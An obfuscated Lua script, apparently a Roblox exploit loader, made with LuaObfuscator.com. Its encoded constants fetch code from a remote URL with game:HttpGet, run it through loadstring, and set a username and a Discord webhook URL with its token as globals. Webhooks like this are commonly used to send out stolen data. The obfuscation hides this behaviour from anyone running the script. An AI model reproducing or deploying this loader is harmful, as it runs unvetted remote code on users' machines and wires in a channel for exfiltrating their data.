--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then function v21(v31,v32,v33)if v33 then local v70=0;local v71;while true do if (v70==(645 -(103 + 542))) then v71=(v31/(2^(v32-(2 -1))))%(2^(((v33-(1 + 0)) -(v32-(2 -(1 + 0)))) + (4 -3))) ;return v71-(v71%(995 -(313 + 242 + 439))) ;end end else local v72=((1182 -(67 + 223)) -(851 + (1937 -(676 + 1222))))^(v32-((1 -0) + 0)) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (1717 -(1293 + 424)) ;end end v22=nil;function v22()local v34=v1(v16,v19,v19);v19=v19 + 1 ;return v34;end v23=nil;v18=2;end if (v18==5) then v30=nil;function v30(v35,v36,v37)local v38=0;local v39;local v40;local v41;while true do if (0==v38) then v39=v35[1];v40=v35[2];v38=1;end if (v38==1) then v41=v35[3];return function(...)local v79=0;local v80;local v81;local v82;local v83;local v84;while true do if (v79==2) then v84=nil;function v84()local v93=v39;local v94=v40;local v95=v41;local v96=v28;local v97={};local v98={};local v99={};for v103=0 -0 ,v83 do if (((4122 -(107 + 256 + 1096))<4120) and (v103>=v95)) then v97[v103-v95 ]=v82[v103 + (4 -3) ];else v99[v103]=v82[v103 + 1 ];end end local v100=(v83-v95) + (1112 -(832 + 279)) ;local v101;local v102;while true do local v104=0 + 0 ;local v105;local v106;while true do if ((v104==((0 -0) + 0)) or (((10143 -5305) -(95 + 187))==(9312 -5860))) then v105=0 -0 ;v106=nil;v104=2 -1 ;end if (((3356 -(319 + 1122))<(3512 -(236 + 200))) and (v104==(1 + 0))) then while true do if (((1157 + 1871)==(5457 -2429)) and (v105==(0 + (1850 -(1006 + 844))))) then v106=0 + 0 ;while true do if (((6284 -(1105 + 380))>(3314 -1822)) and (v106==0)) then local v117=(0 -0) -0 ;while true do if (((1018 + 1840 + 1162)<=4448) and (v117==((8 -5) -2))) then v106=2 -1 ;break;end if (((3365 -(1039 + 791))<(4521 -(168 + 150))) and (v117==(508 -(233 + 275)))) then local v122=0 + 0 ;while true do if (((735 -(59 + 491))<=(18118 -13273)) and (v122==1)) then v117=1;break;end if ((1365>=(654 -422)) and (v122==(0 + (899 -(319 + 580))))) then v101=v93[v80];v102=v101[4 -3 ];v122=2 -1 ;end end end end end if ((v106==(1602 -(752 + 849))) or ((3985 -2733)>(2843 -1181))) then if ((v102<=(1 + 3)) or (4543<1525)) then if (((2515 -1460)<(3723 -1968)) and (v102<=1)) then if ((v102>0) or ((3490 -(123 + 1689))>=(2412 + 959))) then v99[v101[2 + 0 ]]=v101[13 -10 ]~=(0 + 0) ;else v99[v101[(1 + 2) -(2 -1) ]]=v101[(31 -23) -5 ];end elseif ((v102<=2) or ((1424 -(83 + 12 + 167))>=(5772 -(867 + 134)))) then v99[v101[1815 -(1379 + 434) ]]=v37[v101[3]];elseif ((v102==3) or ((515 + 562)>=4693)) then v37[v101[3 + 0 ]]=v99[v101[2 -0 ]];else v99[v101[3 -1 ]]();end elseif (((3865 -(54 + 10))>=(41 + 1815)) and (v102<=(23 -16))) then if (((2022 -(473 + 9))>=(3198 -(3677 -(499 + 647)))) and (v102<=(4 + 1))) then v80=v101[1 + 2 ];elseif ((((4327 -(104 + 874)) + 426)>=(4893 -(452 + (2778 -(472 + 837))))) and (v102==6)) then do return;end else local v151=0 + 0 ;local v152;local v153;local v154;local v155;local v156;local v157;while true do if ((v151==((5 + 2) -4)) or ((282 + 2385)<(2643 -1834))) then while true do if (((3034 + 357)<=4031) and (v152==(2 -1))) then local v179=0 -0 ;while true do if ((v179==(0 + 0)) or ((2146 -(1056 + 917))>3600)) then v155=nil;v156=nil;v179=2 -1 ;end if ((1529>(955 -(55 + 500))) and (v179==(359 -(200 + 158)))) then v152=2 + 0 + 0 ;break;end end end if ((((4482 + 1593) -3217)>=(3203 -(507 + 790))) and (v152==(441 -(372 + 67)))) then v157=nil;while true do if (((332 -132)<=(2452 -(623 + 60))) and ((139 -(92 + (1641 -(1209 + 386))))==v153)) then local v190=0 + 0 ;local v191;while true do if ((v190==(0 -0)) or ((3834 -(65 + 92))>(3935 -((1276 -(410 + 841)) + 113)))) then v191=405 -(146 + 43 + 216) ;while true do if ((v191==(896 -(491 + 405))) or (1617>=(4432 -2611))) then v81=(v156 + v154) -((1884 -(444 + 186)) -(68 + 1185)) ;v157=0 + 0 ;v191=1;end if (((1756 + 614)<((3445 + 240) -(212 + 874))) and (v191==1)) then v153=2;break;end end break;end end end if ((1730<=(1750 + 36 + 162)) and (v153==0)) then local v192=0;local v193;while true do if ((1347<2148) and (v192==(1798 -(1738 + 60)))) then v193=0 -0 ;while true do if ((1981>=235) and (v193==(2 -1))) then v153=1455 -(960 + 494) ;break;end if ((v193==0) or ((1915 -1200)>=((2237 + 3393) -(15 + 3565)))) then local v209=(0 + 0) -0 ;while true do if (((431 + 201 + (3033 -2345))==1320) and ((1 + 0)==v209)) then v193=1;break;end if ((((763 -(9 + 124)) -415)<=(3328 + 572)) and (v209==(0 -(0 -0)))) then v154=v101[2];v155,v156=v96(v99[v154](v13(v99,v154 + (63 -(7 + (77 -22))) ,v101[(3436 -(432 + 1333)) -((2383 -969) + 254) ])));v209=2 -1 ;end end end end break;end end end if ((2==v153) or ((2855 -(883 + 1043))<=(327 -167))) then for v194=v154,v81 do local v195=0 + 0 ;local v196;local v197;while true do if (((3638 + 396)<4829) and (v195==(993 -(44 + 948)))) then while true do if ((1686<=(6167 -(1261 + 24))) and (v196==(0 + 0))) then v197=250 -(182 + 68) ;while true do if (((0 -(1205 -(759 + 446)))==v197) or ((3178 -(664 + 1244))>=(3119 -(99 + 1211)))) then v157=v157 + 1 ;v99[v194]=v155[v157];break;end end break;end end break;end if ((v195==((658 -(59 + 599)) -0)) or ((142 + 2982)>(14989 -10340))) then v196=531 -(186 + 345) ;v197=nil;v195=(1824 -(392 + 820)) -(387 + 224) ;end end end break;end end break;end if ((v152==(0 -0)) or ((4224 -(535 + 327))<=(3532 -2210))) then local v180=0 + 0 + 0 ;while true do if ((v180==(1212 -(135 + 1076))) or ((6517 -(1663 + 280))<(4166 -(1595 -(23 + 297))))) then v152=1286 -(929 + 356) ;break;end if ((v180==((3733 -2712) -(251 + (2059 -(880 + 409))))) or ((974 + 1679)>=(1443 + 2870))) then v153=0 -0 ;v154=nil;v180=354 -(287 + 66) ;end end end end break;end if ((v151==2) or ((1123 + 380)>(2230 -517))) then v156=nil;v157=nil;v151=3;end if (((1254 + 68)==(2643 -1321)) and (v151==(2 -1))) then v154=nil;v155=nil;v151=2;end if (((6660 -1738)>=(420 + 875)) and (v151==((564 + 1153) -(139 + 1578)))) then v152=0 + 0 ;v153=nil;v151=1278 -(281 + 996) ;end end end elseif ((v102<=(37 -(71 -42))) or ((100 + 374)>=(6226 -2432))) then local v135=1452 -(735 + 717) ;local v136;while true do if ((v135==(0 + 0)) or ((5515 -(99 + 600))<=(7938 -3985))) then v136=v101[2 + 0 ];v99[v136]=v99[v136](v13(v99,v136 + (1558 -(179 + 1378)) ,v81));break;end end elseif ((3542==(1736 + 1806)) and (v102==(34 -25))) then local v158=1560 -((3003 -(542 + 1209)) + 308) ;local v159;local v160;local v161;while true do if (((182 + (5583 -(615 + 421)))>=(38 + 246)) and (v158==1)) then v161=nil;while true do if ((v159==1) or (1866>(4848 -(66 + 305)))) then v99[v160 + (1901 -(1452 + (2093 -(1500 + 145)))) ]=v161;v99[v160]=v161[v101[5 -(1195 -(80 + 1114)) ]];break;end if (((5939 -1588)>=(3894 -(189 + 1489))) and (v159==(1085 -(678 + 407)))) then local v184=0 + 0 ;local v185;while true do if ((v184==(1453 -(38 + (4484 -3069)))) or ((8380 -4573)==(8949 -6110))) then v185=(1456 -(331 + 1125)) -0 ;while true do if ((v185==(3 -2)) or ((3336 -(340 + 36))<(6998 -5342))) then v159=1301 -(1100 + 200) ;break;end if (((377 + 361)<=2068) and (v185==(0 -0))) then local v202=(0 -0) -0 ;while true do if ((v202==0) or (4003<(1469 -803))) then v160=v101[233 -(7 + 86 + 138) ];v161=v99[v101[10 -7 ]];v202=1 + 0 ;end if ((4934>=(10139 -5258)) and (v202==(737 -(29 + 707)))) then v185=1604 -(242 + 1361) ;break;end end end end break;end end end end break;end if ((4284>((5769 -(453 + 185)) -3348)) and (v158==(0 -0))) then v159=0;v160=nil;v158=(664 -(381 + 282)) + 0 ;end end elseif ((v99[v101[3 -(1 -0) ]]==v101[4]) or ((2773 -468)<(5907 -3639))) then v80=v80 + 1 + 0 + 0 ;else v80=v101[3];end v80=v80 + 1 ;break;end end break;end end break;end end end end v79=3;end if (v79==3) then A,B=v28(v11(v84));if  not A[1] then local v107=v35[4][v80] or "?" ;error("Script error at ["   .. v107   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v79==0) then v80=1;v81= -1;v79=1;end if (v79==1) then v82={...};v83=v12("#",...) -1 ;v79=2;end end end;end end end return v30(v29(),{},v17)(...);end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v42==(3 -1)) then local v77=997 -(43 + 954) ;while true do if ((1624 -(1362 + 262))~=v77) then else v47=nil;v48=nil;v77=4 -3 ;end if (1==v77) then v42=3 + 0 ;break;end end end if (v42~=3) then else v49=nil;v50=nil;v42=1977 -(696 + 1277) ;end if (v42==(4 -3)) then local v78=0 + 0 ;while true do if (v78==(3 -2)) then v42=1061 -(631 + 428) ;break;end if (v78==(0 + 0)) then v45=nil;v46=nil;v78=1 -0 ;end end end if ((420 -(109 + 307))~=v42) then else while true do if ((135 -(6 + 128))==v43) then local v87=480 -(327 + 153) ;while true do if (0==v87) then local v108=0 + 0 ;while true do if (v108~=0) then else v46=nil;v47=nil;v108=1;end if (v108==(458 -(56 + 401))) then v87=343 -(187 + 155) ;break;end end end if (v87==1) then v43=4 -2 ;break;end end end if (v43~=(0 -0)) then else local v88=805 -(570 + 235) ;while true do if (v88~=(1985 -(1480 + 505))) then else v44=393 -(225 + 168) ;v45=nil;v88=109 -(89 + 19) ;end if ((2 -1)~=v88) then else v43=224 -(10 + 213) ;break;end end end if (v43==(226 -(179 + 44))) then v50=nil;while true do local v91=0 + 0 ;local v92;while true do if ((0 + 0)==v91) then v92=0 + 0 ;while true do if (v92~=(4 -3)) then else if (v44==(1 + 0)) then local v115=0 -0 ;local v116;while true do if (v115==(0 -0)) then v116=0;while true do if (1~=v116) then else local v123=0 -0 ;while true do if (v123==(3 -2)) then v116=86 -(50 + 34) ;break;end if (v123==(0 + 0)) then for v142=1833 -(1395 + 437) ,v49 do local v143=0;local v144;local v145;local v146;local v147;local v148;while true do if (v143==(0 -0)) then v144=0 + 0 ;v145=nil;v143=743 -(327 + 415) ;end if (v143~=1) then else v146=nil;v147=nil;v143=5 -3 ;end if (v143~=(1503 -(771 + 730))) then else v148=nil;while true do if (v144==2) then while true do if (1~=v145) then else v148=nil;while true do if ((291 -(116 + 175))~=v146) then else local v198=0 -0 ;local v199;while true do if ((966 -(245 + 721))~=v198) then else v199=953 -(509 + 444) ;while true do if (v199~=(0 + 0)) then else local v212=0 + 0 ;while true do if (v212==0) then local v219=1177 -(271 + 906) ;while true do if (v219==(0 -0)) then v147=v22();v148=nil;v219=963 -(329 + 633) ;end if (v219~=(514 -(456 + 57))) then else v212=1 + 0 ;break;end end end if (v212~=(4 -3)) then else v199=2 -1 ;break;end end end if (v199~=(1 -0)) then else v146=1831 -(883 + 947) ;break;end end break;end end end if (v146==(1 + 0)) then if (v147==(2 -1)) then v148=v22()~=(0 + 0) ;elseif (v147==2) then v148=v25();elseif (v147~=3) then else v148=v26();end v50[v142]=v148;break;end end break;end if (v145==(0 -0)) then local v186=1975 -(1228 + 747) ;while true do if (v186~=0) then else local v201=0 + 0 ;while true do if (v201==(0 + 0)) then v146=0 -0 ;v147=nil;v201=1 + 0 ;end if (v201==(1 + 0)) then v186=1 + 0 ;break;end end end if (v186~=(2 -1)) then else v145=1 -0 ;break;end end end end break;end if (v144==(0 + 0)) then local v176=0;while true do if (v176==(0 -0)) then v145=219 -(53 + 166) ;v146=nil;v176=572 -(479 + 92) ;end if (v176==(2 -1)) then v144=571 -(322 + 248) ;break;end end end if (v144~=1) then else local v177=1589 -(1189 + 400) ;while true do if (v177==0) then v147=nil;v148=nil;v177=1 + 0 ;end if (v177==(1130 -(413 + 716))) then v144=5 -3 ;break;end end end end break;end end end v48[3]=v22();v123=1041 -(246 + 794) ;end end end if (v116~=(1553 -(1450 + 103))) then else local v124=0 -0 ;local v125;while true do if (v124==(0 -0)) then v125=1690 -(265 + 1425) ;while true do if (v125~=1) then else v116=1 + 0 ;break;end if (v125==(1588 -(767 + 821))) then local v164=0;while true do if ((0 + 0)==v164) then v49=v24();v50={};v164=1;end if (v164~=1) then else v125=1424 -(520 + 903) ;break;end end end end break;end end end if (v116==(1 + 1)) then v44=1560 -(153 + 1405) ;break;end end break;end end end break;end if (v92~=(0 -0)) then else local v114=0;while true do if (v114==(1 + 0)) then v92=4 -3 ;break;end if (v114==(0 -0)) then if (v44~=(1 + 1)) then else local v118=0 -0 ;local v119;while true do if (0~=v118) then else v119=0 -0 ;while true do local v126=0;while true do if (v126==(0 -0)) then if (v119==(0 -0)) then for v168=1,v24() do local v169=0 + 0 ;local v170;local v171;local v172;while true do if (v169==(1 -0)) then v172=nil;while true do if (v170~=(1 -0)) then else while true do if (v171==(0 + 0)) then v172=v22();if (v21(v172,1 + 0 ,1)==(0 + 0)) then local v203=0;local v204;local v205;local v206;local v207;local v208;while true do if (v203==(0 -0)) then v204=154 -(6 + 148) ;v205=nil;v203=1 + 0 ;end if ((1283 -(1169 + 112))==v203) then v208=nil;while true do if (v204==(8 -6)) then while true do if (v205==0) then local v220=788 -(49 + 739) ;local v221;while true do if ((0 -0)==v220) then v221=0 -0 ;while true do if (v221==(3 -2)) then v205=1 + 0 ;break;end if (v221==(952 -(767 + 185))) then local v231=1818 -(1220 + 598) ;local v232;while true do if (v231~=(0 + 0)) then else v232=0 + 0 ;while true do if (v232==(1286 -(782 + 503))) then v221=1 + 0 ;break;end if (v232==(0 + 0)) then v206=v21(v172,2,2 + 1 );v207=v21(v172,821 -(357 + 460) ,6);v232=2 -1 ;end end break;end end end end break;end end end if (v205==(1 + 0)) then local v222=1914 -(1215 + 699) ;local v223;while true do if (v222==(658 -(180 + 478))) then v223=0 -0 ;while true do if (v223==1) then v205=4 -2 ;break;end if (v223==(0 -0)) then v208={v23(),v23(),nil,nil};if (v206==(1016 -(83 + 933))) then local v233=1192 -(1064 + 128) ;local v234;while true do if (v233~=(0 + 0)) then else v234=262 -(200 + 62) ;while true do if (v234==0) then v208[6 -3 ]=v23();v208[1070 -(986 + 80) ]=v23();break;end end break;end end elseif (v206==(1 -0)) then v208[6 -3 ]=v24();elseif (v206==2) then v208[1932 -(1843 + 86) ]=v24() -((768 -(105 + 661))^(73 -57)) ;elseif (v206==3) then local v243=0;local v244;local v245;while true do if (v243==1) then while true do if (v244~=(0 -0)) then else v245=0 + 0 ;while true do if (v245==(0 -0)) then v208[1852 -(1049 + 800) ]=v24() -((525 -(50 + 473))^(44 -28)) ;v208[1668 -(601 + 1063) ]=v23();break;end end break;end end break;end if (v243==(1055 -(280 + 775))) then v244=0 + 0 ;v245=nil;v243=369 -(27 + 341) ;end end end v223=1 + 0 ;end end break;end end end if ((399 -(269 + 127))==v205) then if (v21(v207,3,3)==1) then v208[206 -(129 + 73) ]=v50[v208[4]];end v45[v168]=v208;break;end if ((3 -1)==v205) then local v225=0;local v226;local v227;while true do if (v225==(0 + 0)) then v226=0 + 0 ;v227=nil;v225=1640 -(211 + 1428) ;end if (v225==(2000 -(484 + 1515))) then while true do if (v226==(48 -(20 + 28))) then v227=0;while true do if (v227==(1072 -(446 + 625))) then v205=1 + 2 ;break;end if (v227==0) then if (v21(v207,838 -(179 + 658) ,1 -0 )~=1) then else v208[1 + 1 ]=v50[v208[2]];end if (v21(v207,1 + 1 ,7 -5 )==1) then v208[1 + 2 ]=v50[v208[2 + 1 ]];end v227=1;end end break;end end break;end end end end break;end if (v204==(0 + 0)) then local v216=0;local v217;while true do if (v216==(0 -0)) then v217=0 -0 ;while true do if (v217~=(64 -(47 + 16))) then else v204=1 + 0 ;break;end if (v217==(1970 -(1013 + 957))) then local v230=0;while true do if (v230==1) then v217=1;break;end if (v230==(0 + 0)) then v205=0;v206=nil;v230=2 -1 ;end end end end break;end end end if (v204==(2 -1)) then local v218=0 + 0 ;while true do if ((0 + 0)==v218) then v207=nil;v208=nil;v218=119 -(112 + 6) ;end if (v218~=1) then else v204=1 + 1 ;break;end end end end break;end if (v203~=1) then else v206=nil;v207=nil;v203=9 -7 ;end end end break;end end break;end if (v170==(0 + 0)) then local v187=0 + 0 ;while true do if (v187~=(0 -0)) then else v171=0 + 0 ;v172=nil;v187=194 -(122 + 71) ;end if (v187==(868 -(541 + 326))) then v170=1 + 0 ;break;end end end end break;end if (v169~=0) then else local v178=0;while true do if (v178==(0 + 0)) then v170=0;v171=nil;v178=1;end if (v178~=1) then else v169=1 + 0 ;break;end end end end end for v173=3 -2 ,v24() do v46[v173-(1 -0) ]=v29();end v119=2 -1 ;end if (v119~=1) then else local v165=0;local v166;while true do if (v165~=0) then else v166=1801 -(397 + 1404) ;while true do if (v166~=(0 + 0)) then else for v188=1,v24() do v47[v188]=v24();end return v48;end end break;end end end break;end end end break;end end end if (v44==0) then local v120=0 -0 ;local v121;while true do if (v120==0) then v121=0;while true do if (v121==(1329 -(355 + 972))) then v44=2 -1 ;break;end if (v121==(0 -0)) then local v138=971 -(682 + 289) ;local v139;while true do if (v138==(731 -(386 + 345))) then v139=0;while true do if (v139==1) then v121=1144 -(257 + 886) ;break;end if ((0 + 0)==v139) then v45={};v46={};v139=1 -0 ;end end break;end end end if (v121==1) then local v140=0 -0 ;local v141;while true do if (v140~=(0 -0)) then else v141=0;while true do if ((0 + 0)~=v141) then else local v175=0 + 0 ;while true do if (v175==(0 -0)) then v47={};v48={v45,v46,nil,v47};v175=2 -1 ;end if (v175~=(1525 -(113 + 1411))) then else v141=3 -2 ;break;end end end if (v141==(1 + 0)) then v121=934 -(765 + 167) ;break;end end break;end end end end break;end end end v114=1;end end end end break;end end end break;end if (v43==(6 -4)) then local v89=133 -(68 + 65) ;local v90;while true do if (v89==(0 -0)) then v90=0 -0 ;while true do if (v90==(531 -(465 + 65))) then v43=3;break;end if ((0 -0)~=v90) then else local v113=0 -0 ;while true do if (v113==(261 -(137 + 124))) then v48=nil;v49=nil;v113=1 -0 ;end if ((3 -2)~=v113) then else v90=1 + 0 ;break;end end end end break;end end end end break;end if (v42==0) then v43=0 -0 ;v44=nil;v42=1;end end end v18=5;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51)if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v73=v2(v0(v51,16));if v20 then local v85=0;local v86;while true do if (v85==1) then return v86;end if (v85==0) then v86=v5(v73,v20);v20=nil;v85=1;end end else return v73;end end end);v21=nil;v18=1;end if (v18==2) then function v23()local v52,v53=v1(v16,v19,v19 + (857 -(675 + 180)) );v19=v19 + (728 -(594 + 132)) ;return (v53 * 256) + v52 ;end v24=nil;function v24()local v54,v55,v56,v57=v1(v16,v19,v19 + (855 -(77 + 506 + 269)) );v19=v19 + ((3459 -2073) -(1103 + 279)) ;return (v57 * (82316809 -65539593)) + (v56 * (66199 -(224 + 439))) + (v55 * (2149 -(773 + 1120))) + v54 ;end v25=nil;v18=3;end if (3==v18) then function v25()local v58=0 -(0 + 0) ;local v59;local v60;local v61;local v62;local v63;local v64;while true do if ((0 + 0)==v58) then v59=v24();v60=v24();v58=1 -0 ;end if ((1 + 2)==v58) then if (v63==(0 -0)) then if (v62==(0 + 0)) then return v64 * (0 -0) ;else v63=1 -0 ;v61=781 -(25 + 756) ;end elseif (v63==(4949 -2902)) then return ((v62==0) and (v64 * ((1785 -(1494 + 290))/(1312 -(684 + 628))))) or (v64 * NaN) ;end return v8(v64,v63-1023 ) * (v61 + (v62/((175 -(162 + (18 -7)))^(1253 -(541 + 660))))) ;end if (v58==(59 -(50 + 7))) then v63=v21(v60,170 -(148 + 1) ,353 -(271 + 21 + 30) );v64=((v21(v60,1661 -(41 + 1588) )==1) and  -(211 -(176 + 34))) or (2 -1) ;v58=(1651 -(895 + 754)) + 1 ;end if ((1 + 0)==v58) then v61=4 -3 ;v62=(v21(v60,475 -(110 + 364) ,(45 + 15) -40 ) * ((4 -2)^(158 -126))) + v59 ;v58=4 -2 ;end end end v26=nil;function v26(v65)local v66;if  not v65 then v65=v24();if (v65==(0 + 0)) then return "";end end v66=v3(v16,v19,(v19 + v65) -(1960 -(1475 + 484)) );v19=v19 + v65 ;local v67={};for v68=1, #v66 do v67[v68]=v2(v1(v3(v66,v68,v68)));end return v6(v67);end v27=v24;v18=4;end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756103083O00557365724E616D6503123O00626F2O736D616E314O3933363438373203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313631352O323734352O3338323731382F684943486C7034374E5639325954314B4741576C67546D69786A7541587762664943372D6553513952346F4F7943706F2D317A382D566F42327267557867312O45586D3400153O00124O00013O00260A3O000C000100020004053O000C0001001202000100033O001202000200043O00200900020002000500122O000400064O0001000500014O0007000200054O000800013O00022O00040001000100010004053O0014000100260A3O0001000100010004053O0001000100122O000100083O001203000100073O00122O0001000A3O001203000100093O00124O00023O0004053O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
